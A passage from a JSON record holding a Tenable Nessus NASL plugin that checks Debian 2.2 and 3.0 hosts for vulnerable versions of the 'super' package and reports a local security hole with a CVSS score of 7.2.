script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:super\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:2.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2002/08/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"2.2\", prefix:\"super\", reference:\"3.12.2-2.1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"super\", reference:\"3.16.1-1.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}